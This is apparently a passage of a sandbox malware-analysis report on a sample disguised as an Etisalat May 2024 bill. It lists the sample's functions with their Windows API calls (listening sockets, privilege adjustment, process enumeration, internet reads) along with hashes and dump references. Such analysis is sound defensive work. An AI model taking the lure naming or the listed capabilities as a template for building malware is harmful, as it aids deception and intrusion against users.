                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                      • String ID: $@$SeShutdownPrivilege
                                      • API String ID: 2234035333-194228
                                      • Opcode ID: 74ddbc5568a3f959c071ff7bd70cd22b309a54f98728e5a9c2114ba6026522fc
                                      • Instruction ID: 2a421f7b57dc668a78ca39d787139bccd5226ff27f11ab5d02bcf582f7226677
                                      • Opcode Fuzzy Hash: 74ddbc5568a3f959c071ff7bd70cd22b309a54f98728e5a9c2114ba6026522fc
                                      • Instruction Fuzzy Hash: 49012F71755A022BF73C6778EC8AFBA72D8EB04342F2000A9FC46D62D6DA903CC081A0
                                      Function 00BD6596 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00BD65EF
                                      • WSAGetLastError.WSOCK32(00000000), ref: 00BD65FE
                                      • bind.WSOCK32(00000000,?,00000010), ref: 00BD661A
                                      • listen.WSOCK32(00000000,00000005), ref: 00BD6629
                                      • WSAGetLastError.WSOCK32(00000000), ref: 00BD6643
                                      • closesocket.WSOCK32(00000000,00000000), ref: 00BD6657
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: ErrorLast$bindclosesocketlistensocket
                                      • String ID:
                                      • API String ID: 1279440585-0
                                      • Opcode ID: 0826e36e41efa2beadca48105d7c603d83c6b4eaac15c36851214a49f6897274
                                      • Instruction ID: 42ac8813d1309368b061a4fafe15949994bb3b3b7aab1ef867d4537d6dc25aa8
                                      • Opcode Fuzzy Hash: 0826e36e41efa2beadca48105d7c603d83c6b4eaac15c36851214a49f6897274
                                      • Instruction Fuzzy Hash: 3D219C312002059FDB10AF64C885BBEB7E9EF48720F1481AAE956EB3D1DB74AD01CB51
                                      Function 00B75680 Relevance: 8.0, APIs: 5, Instructions: 516COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00B80FF6: std::exception::exception.LIBCMT ref: 00B8102C
                                        • Part of subcall function 00B80FF6: __CxxThrowException@8.LIBCMT ref: 00B81041
                                      • _memmove.LIBCMT ref: 00BB062F
                                      • _memmove.LIBCMT ref: 00BB0744
                                      • _memmove.LIBCMT ref: 00BB07EB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: _memmove$Exception@8Throwstd::exception::exception
                                      • String ID:
                                      • API String ID: 1300846289-0
                                      • Opcode ID: 7d0c3f64cc732bcc512e7f279cc8393b003b2c1cbf5227a3712c1da1407c7524
                                      • Instruction ID: 4835a93d29eea81aa55e2467fcb21aa60b23871a78dfc867c7f617ea3b153e19
                                      • Opcode Fuzzy Hash: 7d0c3f64cc732bcc512e7f279cc8393b003b2c1cbf5227a3712c1da1407c7524
                                      • Instruction Fuzzy Hash: 7A027DB0A10209DBCF14EF64D981ABEBBF5FF44300F1480A9E80ADB255EB75DA51CB91
                                      Function 00B61287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00B62612: GetWindowLongW.USER32(?,000000EB), ref: 00B62623
                                      • DefDlgProcW.USER32(?,?,?,?,?), ref: 00B619FA
                                      • GetSysColor.USER32(0000000F), ref: 00B61A4E
                                      • SetBkColor.GDI32(?,00000000), ref: 00B61A61
                                        • Part of subcall function 00B61290: DefDlgProcW.USER32(?,00000020,?), ref: 00B612D8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: ColorProc$LongWindow
                                      • String ID:
                                      • API String ID: 3744519093-0
                                      • Opcode ID: 7cd30817d304e72aa3567b6256d0ebb6925f71915d8f17b2a6059fb6d929544b
                                      • Instruction ID: 9fa9a3912fc5702e4bd8ae2033155fcafc83a351bc8038d03cd0c02f52a2c46e
                                      • Opcode Fuzzy Hash: 7cd30817d304e72aa3567b6256d0ebb6925f71915d8f17b2a6059fb6d929544b
                                      • Instruction Fuzzy Hash: 87A15971105584BEEA38ABADAD85E7F39ECDB41346B1C49E9F412D61D2CF2C8D02D2B1
                                      Function 00BD6A5A Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00BD80A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00BD80CB
                                      • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00BD6AB1
                                      • WSAGetLastError.WSOCK32(00000000), ref: 00BD6ADA
                                      • bind.WSOCK32(00000000,?,00000010), ref: 00BD6B13
                                      • WSAGetLastError.WSOCK32(00000000), ref: 00BD6B20
                                      • closesocket.WSOCK32(00000000,00000000), ref: 00BD6B34
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                      • String ID:
                                      • API String ID: 99427753-0
                                      • Opcode ID: 62c21c2c15febd92876180685f259eccf9d9284fed18312ad0c164ea85ffdee1
                                      • Instruction ID: 8d3bdeef58bcf51ae396acee1f9b35ece5ee4cfa48171a4407e1b6e7a2fc2d2a
                                      • Opcode Fuzzy Hash: 62c21c2c15febd92876180685f259eccf9d9284fed18312ad0c164ea85ffdee1
                                      • Instruction Fuzzy Hash: 0F41A475700210AFEB10AF64DC86F7EB7E9EB44710F048199FA5AAB3D2DA789D008791
                                      Function 00BE55FD Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                      • String ID:
                                      • API String ID: 292994002-0
                                      • Opcode ID: 3a007cb047313ee07c716b905e673261f19ace29acd10b6d608ae62c92f30b87
                                      • Instruction ID: ed88d0db25d01cfedf05edde137d1b7dd576feefce62990b5979a873cc045a35
                                      • Opcode Fuzzy Hash: 3a007cb047313ee07c716b905e673261f19ace29acd10b6d608ae62c92f30b87
                                      • Instruction Fuzzy Hash: B011B2317009916FEB211F27DC84A6B77D8FF94725B444469E806DB241CB749D01CAA4
                                      Function 00BDC304 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00BA1D88,?), ref: 00BDC312
                                      • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00BDC324
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                      • API String ID: 2574300362-1816364905
                                      • Opcode ID: 2d77f7a8eb73522b327ab46a7560975c0f6e55fa04550964865ee61a1c6851c5
                                      • Instruction ID: 828c521258703fa3293ce2f9d842b74b1b3703ee50ebc0c600c0e031a7c06b11
                                      • Opcode Fuzzy Hash: 2d77f7a8eb73522b327ab46a7560975c0f6e55fa04550964865ee61a1c6851c5
                                      • Instruction Fuzzy Hash: 51E08C70200B03CFCB204F25D844A96BAD4EF09324B80C4BAE886D7220EB70D880CA60
                                      Function 00B73190 Relevance: 6.6, APIs: 4, Instructions: 587COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: __itow__swprintf
                                      • String ID:
                                      • API String ID: 674341424-0
                                      • Opcode ID: c03bb8eadf98e722d811ce3d51efd2e5f813ff0b4a2335f1a5de5cd582820ca2
                                      • Instruction ID: 302e0df98f6b10684b5f98110de4b407fc62bf5b31826ac2a2fdc6aece15f164
                                      • Opcode Fuzzy Hash: c03bb8eadf98e722d811ce3d51efd2e5f813ff0b4a2335f1a5de5cd582820ca2
                                      • Instruction Fuzzy Hash: 0A228A7160C3019FC724DF24C891B6AB7E4EF85700F1489ADF9AA97291DB75EA04CB92
                                      Function 00BDF121 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00BDF151
                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00BDF15F
                                        • Part of subcall function 00B67F41: _memmove.LIBCMT ref: 00B67F82
                                      • Process32NextW.KERNEL32(00000000,?), ref: 00BDF21F
                                      • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00BDF22E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                      • String ID:
                                      • API String ID: 2576544623-0
                                      • Opcode ID: 6c68059d4c9435cdb120dc5d5283c259d931d862fa7fb492a0696305407a1b88
                                      • Instruction ID: d426740773610ce1322f69351ed9e4dc6cdcf3ca58e91f8e54e01f803912a20e
                                      • Opcode Fuzzy Hash: 6c68059d4c9435cdb120dc5d5283c259d931d862fa7fb492a0696305407a1b88
                                      • Instruction Fuzzy Hash: B3517F71508301AFD320EF24DC85E6BBBE8FF98710F14496DF59697291EB74A908CB92
                                      Function 00BC40B1 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00BC40D1
                                      • _memset.LIBCMT ref: 00BC40F2
                                      • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00BC4144
                                      • CloseHandle.KERNEL32(00000000), ref: 00BC414D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: CloseControlCreateDeviceFileHandle_memset
                                      • String ID:
                                      • API String ID: 1157408455-0
                                      • Opcode ID: 32ef0cb3613e17c736a7a1ce5717e8c08d7785bdaaf26a92435c401c3e655b3e
                                      • Instruction ID: a57b4c205e030b9321dc981061e600894ae21f7f2a1064065f652d6dcb24904e
                                      • Opcode Fuzzy Hash: 32ef0cb3613e17c736a7a1ce5717e8c08d7785bdaaf26a92435c401c3e655b3e
                                      • Instruction Fuzzy Hash: 361198759412287AD7305BA59C8DFABBBBCEB44760F1041DAF908E7190D6744F808BA5
                                      Function 00BBEB07 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00BBEB19
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: lstrlen
                                      • String ID: ($|
                                      • API String ID: 1659193697-1631851259
                                      • Opcode ID: 2a587cd77219293681e859eb2e11b5535daa641413a14613e3205b9e8624c233
                                      • Instruction ID: a2295791ec99aca9c2646813081d190a71486f2938dba1a7241a2fcec7c1cb4a
                                      • Opcode Fuzzy Hash: 2a587cd77219293681e859eb2e11b5535daa641413a14613e3205b9e8624c233
                                      • Instruction Fuzzy Hash: 2B322875A007059FD728DF19C481AAAB7F1FF48310B15C5AEE4AADB3A1D7B0E941CB40
                                      Function 00BD25E2 Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 00BD26D5
                                      • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00BD270C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Internet$AvailableDataFileQueryRead
                                      • String ID:
                                      • API String ID: 599397726-0
                                      • Opcode ID: 0390df1f59f2a3ebedbcb1016ce59f174a136429868bb724872188eced1b3590
                                      • Instruction ID: 58eb8ac4941edd0c442205045514804dea5678b72557bd05642c4c7c9888d441
                                      • Opcode Fuzzy Hash: 0390df1f59f2a3ebedbcb1016ce59f174a136429868bb724872188eced1b3590
                                      • Instruction Fuzzy Hash: 12419F71900389BFEB209B94DCC5EBBF7ECEB60714F1040ABF601A6240FA71DE419654
                                      Function 00BCB59E Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 00BCB5AE
                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00BCB608
                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00BCB655
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: ErrorMode$DiskFreeSpace
                                      • String ID:
                                      • API String ID: 1682464887-0
                                      • Opcode ID: 2d91a639d8d82aa828744ca8a42f3bb109c1a9c162ab0b2429aee68219d7cd3c
                                      • Instruction ID: df444a7c64d2abebc8a86889775d27093ea8cf3e61f038cce4323edddbb51491
                                      • Opcode Fuzzy Hash: 2d91a639d8d82aa828744ca8a42f3bb109c1a9c162ab0b2429aee68219d7cd3c
                                      • Instruction Fuzzy Hash: DA215C35A00518EFCB00EFA5D891EEDBBF8FF48310F1480A9E945AB351DB31A915CB51
                                      Function 00BB8CC3 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00B80FF6: std::exception::exception.LIBCMT ref: 00B8102C
                                        • Part of subcall function 00B80FF6: __CxxThrowException@8.LIBCMT ref: 00B81041
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00BB8D0D
                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00BB8D3A
                                      • GetLastError.KERNEL32 ref: 00BB8D47
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                      • String ID:
                                      • API String ID: 1922334811-0
                                      • Opcode ID: 1643952528de05b1223b38f74805b05cd5d48c927a804f35daeee8f2462ee6fe
                                      • Instruction ID: bb23da22b5140f1f9cc7b3f8df46baa622ee49ea3ad3637344a13e8b301b7517
                                      • Opcode Fuzzy Hash: 1643952528de05b1223b38f74805b05cd5d48c927a804f35daeee8f2462ee6fe
                                      • Instruction Fuzzy Hash: A2119AB1814209AFE728AF68DC85DBBB7FCEB44710B20856EF44687251EF70AC40CB20
                                      Function 00BC4C03 Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00BC4C2C
                                      • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00BC4C43
                                      • FreeSid.ADVAPI32(?), ref: 00BC4C53
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                      • String ID:
                                      • API String ID: 3429775523-0
                                      • Opcode ID: 57d3177691af5e2571ad8d3f7a4c0ce2c0120abec31c5a4cb723ab0f0ae209b1
                                      • Instruction ID: fcef2a42c5e717562f1215aa9a48749588151198b373387d5463a407d8829025
                                      • Opcode Fuzzy Hash: 57d3177691af5e2571ad8d3f7a4c0ce2c0120abec31c5a4cb723ab0f0ae209b1
                                      • Instruction Fuzzy Hash: 26F03775A11209BBDB04DFE09C89ABEBBB8EB08211F0044A9A901E6182E6706A048B50
                                      Function 00B6E060 Relevance: 3.5, APIs: 2, Instructions: 539COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ff9193f7c8947d167839ee9410ef30d494c1ddc44eef87ebff6a5547d43b5151
                                      • Instruction ID: 8988d3d28e7754f768352ee4d15f1fb99fa6989f4c1daf161982f77a1e0814d2
                                      • Opcode Fuzzy Hash: ff9193f7c8947d167839ee9410ef30d494c1ddc44eef87ebff6a5547d43b5151
                                      • Instruction Fuzzy Hash: 8122BF78A04216CFDB24DF58C490AAEB7F1FF05300F1485A9E966AB351E738ED85CB91
                                      Function 00BCC93C Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?), ref: 00BCC966
                                      • FindClose.KERNEL32(00000000), ref: 00BCC996
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Find$CloseFileFirst
                                      • String ID:
                                      • API String ID: 2295610775-0
                                      • Opcode ID: 3d1762c4b1a22f1dcb4c0b8d2094e0f3d065b0e8adc59f8e5242861f2194a9c0
                                      • Instruction ID: 4abe9145422c7a1e2af950006c89716a6b565395125a7573d465d06fc0c422f2
